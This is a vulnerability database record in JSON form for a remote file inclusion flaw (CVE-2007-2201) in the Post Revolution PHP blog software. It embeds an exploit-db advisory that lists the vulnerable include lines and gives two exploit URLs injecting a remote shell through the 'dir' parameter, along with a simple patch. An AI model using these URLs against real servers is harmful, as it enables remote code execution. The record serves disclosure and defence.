ID OSVDB:35318
Type osvdb
Reporter OSVDB
Modified 2007-04-22T10:48:28
Description
No description provided by the source
References:
Secunia Advisory ID:24971
Related OSVDB ID: 35317
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0405.html
ISS X-Force ID: 33825
Generic Exploit URL: http://www.milw0rm.com/exploits/3785
FrSIRT Advisory: ADV-2007-1513
CVE-2007-2201
Bugtraq ID: 23607
{"href": "https://vulners.com/osvdb/OSVDB:35318", "id": "OSVDB:35318", "reporter": "OSVDB", "published": "2007-04-22T10:48:28", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:24971](https://secuniaresearch.flexerasoftware.com/advisories/24971/)\n[Related OSVDB ID: 35317](https://vulners.com/osvdb/OSVDB:35317)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0405.html\nISS X-Force ID: 33825\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3785\nFrSIRT Advisory: ADV-2007-1513\n[CVE-2007-2201](https://vulners.com/cve/CVE-2007-2201)\nBugtraq ID: 23607\n", "title": "Post Revolution themes/default/preview_post_completo.php dir Variable Remote File Inclusion", "lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "references": [], "edition": 1, "cvelist": ["CVE-2007-2201"], "affectedSoftware": [], "viewCount": 1, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2017-04-28T13:20:31", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2201"]}, {"type": "exploitdb", "idList": ["EDB-ID:3785"]}, {"type": "osvdb", "idList": ["OSVDB:35317"]}], "modified": "2017-04-28T13:20:31", "rev": 2}, "vulnersScore": 6.7}, "modified": "2007-04-22T10:48:28", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:31:23", "description": "Multiple PHP remote file inclusion vulnerabilities in Post Revolution 6.6 and 7.0 RC2 allow remote attackers to execute arbitrary PHP code via a URL in the dir parameter to (1) common.php or (2) themes/default/preview_post_completo.php.", "edition": 4, "cvss3": {}, "published": "2007-04-24T20:19:00", "title": "CVE-2007-2201", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-2201"], "modified": "2018-10-16T16:42:00", "cpe": ["cpe:/a:post_revolution:post_revolution:6.6", "cpe:/a:post_revolution:post_revolution:7.0_rc2"], "id": "CVE-2007-2201", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2201", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:post_revolution:post_revolution:7.0_rc2:*:*:*:*:*:*:*", "cpe:2.3:a:post_revolution:post_revolution:6.6:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "cvelist": ["CVE-2007-2201"], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:24971](https://secuniaresearch.flexerasoftware.com/advisories/24971/)\n[Related OSVDB ID: 35318](https://vulners.com/osvdb/OSVDB:35318)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0405.html\nISS X-Force ID: 33825\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3785\nFrSIRT Advisory: ADV-2007-1513\n[CVE-2007-2201](https://vulners.com/cve/CVE-2007-2201)\nBugtraq ID: 23607\n", "edition": 1, "modified": "2007-04-22T10:48:28", "published": "2007-04-22T10:48:28", "href": "https://vulners.com/osvdb/OSVDB:35317", "id": "OSVDB:35317", "title": "Post Revolution common.php dir Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T19:17:49", "description": "Post Revolution <= 0.7.0 RC 2 (dir) Remote File Inclusion Vulnerability. CVE-2007-2201. Webapps exploit for php platform", "published": "2007-04-23T00:00:00", "type": "exploitdb", "title": "Post Revolution <= 0.7.0 RC 2 dir Remote File Inclusion Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2201"], "modified": "2007-04-23T00:00:00", "id": "EDB-ID:3785", "href": "https://www.exploit-db.com/exploits/3785/", "sourceData": "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n Post Revolution Remote File Inclusion\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n Affected Software .: Post Revolution 6.6 / 7.0 Release Candidate 2\n Download..: http://www.fabio.com.ar/postrev/\n Risk ..............: high\n Date .........: 25/3/2007\n Found by ..........: InyeXion\n Contact ...........: InyeXion[at]gmail.com\n Web .............: Www.InyeXion.com.ar\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n Affected File:\n/common.php\n/themes/default/preview_post_completo.php\n\n Vulnerable Code:\n\n/common.php\n\nLine [10] include ($dir.\"themes/\".$config_data[\"template\"].\"/encabezado.php\");\nLine [16] include ($dir.\"themes/\".$config_data[\"template\"].\"/cuerpo.php\");\nLine [22] include ($dir.\"themes/\".$config_data[\"template\"].\"/pie.php\");\nLine [37] include ($dir.\"themes/\".$config_data[\"template\"].\"/menu_principal.php\");\nLine [49] include ($dir.\"themes/\".$config_data[\"template\"].\"/error.php\");\nLine [129] include ($dir.\"themes/\".$config_data[\"template\"].\"/login_form.php\");\nLine [135] include ($dir.\"themes/\".$config_data[\"template\"].\"/logout.php\");\nLine [174] include ($dir.\"language/\".$config_data[\"lang\"].\".php\");\nLine [272] include ($dir.\"language/\".$config_data[\"lang\"].\".php\");\nLine [282] include ($dir.\"themes/\".$config_data[\"template\"].\"/seccion.php\");\nLine [360] include ($dir.\"language/\".$config_data[\"lang\"].\".php\");\nLine [446] include ($dir.\"themes/\".$config_data[\"template\"].\"/post.php\");\nLine [460] include ($dir.\"language/\".$config_data[\"lang\"].\".php\");\nLine [543] include ($dir.\"themes/\".$config_data[\"template\"].\"/archivo_noticias.php\");\nLine [549] include ($dir.\"themes/\".$config_data[\"template\"].\"/cuerpo_archivo.php\");\nLine [570] include ($dir.\"language/\".$config_data[\"lang\"].\".php\");\nLine [628] include ($dir.\"themes/\".$config_data[\"template\"].\"/post_completo.php\");\nLine [641] include ($dir.\"language/\".$config_data[\"lang\"].\".php\");\nLine [661] include ($dir.\"language/\".$config_data[\"lang\"].\".php\");\nLine [680] include ($dir.\"themes/\".$config_data[\"template\"].\"/posts_usuario.php\");\nLine [692] include ($dir.\"language/\".$config_data[\"lang\"].\".php\");\nLine [715] include ($dir.\"themes/\".$config_data[\"template\"].\"/comment_encabezado.php\");\nLine [750] include ($dir.\"themes/\".$config_data[\"template\"].\"/comment.php\");\nLine [770] include ($dir.\"themes/\".$config_data[\"template\"].\"/comment_form.php\");\nLine [776] include ($dir.\"themes/\".$config_data[\"template\"].\"/info.php\");\nLine [782] include ($dir.\"themes/\".$config_data[\"template\"].\"/info.php\");\nLine [1054] include ($dir.\"language/\".$config_data[\"lang\"].\".php\");\nLine [1106] include ($dir.\"themes/\".$config_data[\"template\"].\"/encuesta_head.php\");\nLine [1124] include ($dir.\"themes/\".$config_data[\"template\"].\"/encuesta_opc.php\");\nLine [1128] include ($dir.\"themes/\".$config_data[\"template\"].\"/encuesta_pie.php\");\nLine [1159] include ($dir.\"themes/\".$config_data[\"template\"].\"/encuesta_head_ver.php\");\nLine [1180] include ($dir.\"themes/\".$config_data[\"template\"].\"/encuesta_opc_ver.php\");\nLine [1183] include ($dir.\"themes/\".$config_data[\"template\"].\"/encuesta_pie_ver.php\");\nLine [1231] include ($dir.\"themes/\".$config_data[\"template\"].\"/encuestas_anteriores.php\");\nLine [1242] include ($dir.\"themes/\".$config_data[\"template\"].\"/tagmenu.php\");\nLine [1297] include ($dir.\"themes/\".$config_data[\"template\"].\"/tagpost.php\");\nLine [1310] include ($dir.\"language/\".$config_data[\"lang\"].\".php\");\nLine [1482] include ($dir.\"language/\".$config_data[\"lang\"].\".php\");\nLine [1506] include ($dir.\"themes/\".$config_data[\"template\"].\"/categoria_enlace.php\");\nLine [1521] include ($dir.\"themes/\".$config_data[\"template\"].\"/enlacefila.php\");\nLine [1570] include ($dir.\"config.php\");\nLine [1676] include ($dir.\"language/\".$config_data[\"lang\"].\".php\");\nLine [1678] include ($dir.\"themes/\".$config_data[\"template\"].\"/buscar.php\");\nLine [1685] include ($dir.\"language/\".$config_data[\"lang\"].\".php\");\nLine [1723] include ($dir.\"themes/\".$config_data[\"template\"].\"/resultado.php\");\nLine [1730] include ($dir.\"language/\".$config_data[\"lang\"].\".php\");\nLine [1766] include ($dir.\"themes/\".$config_data[\"template\"].\"/busq-dato.php\");\nLine [1772] include ($dir.\"themes/\".$config_data[\"template\"].\"/busq-resultado.php\");\nLine [1778] include ($dir.\"themes/\".$config_data[\"template\"].\"/busq-resultado.php\");\nLine [1790] include ($dir.\"language/\".$config_data[\"lang\"].\".php\");\nLine [1813] include ($dir.\"themes/\".$config_data[\"template\"].\"/categoria_descarga.php\");\nLine [1834] include ($dir.\"themes/\".$config_data[\"template\"].\"/descargafila.php\");\nLine [1875] include ($dir.\"language/\".$config_data[\"lang\"].\".php\");\nLine [1892] include ($dir.\"language/\".$config_data[\"lang\"].\".php\");\nLine [1908] include ($dir.\"language/\".$config_data[\"lang\"].\".php\");\nLine [1924] include ($dir.\"language/\".$config_data[\"lang\"].\".php\");\nLine [2061] include ($dir.\"include/anti-spam.php\");\n\n\n/themes/default/preview_post_completo.php\n\nLine [3] include ($dir.\"themes/\".$config_data[\"template\"].\"/post_completo.php\");\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nExploit:\n\nhttp://[target]/common.php?dir=Shell\nhttp://[target]/themes/default/preview_post_completo.php?dir=Shell\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nFixed bug:\n\n/common.php and /themes/default/preview_post_completo.php insert\n\nif((isset($_REQUEST['dir']) || isset($_GET['dir']) || isset($_POST['dir'])) && !defined(\"dir\")){\ndie(\"Fixed bug by InyeXion.\");\n }\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n# milw0rm.com [2007-04-23]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3785/"}]}
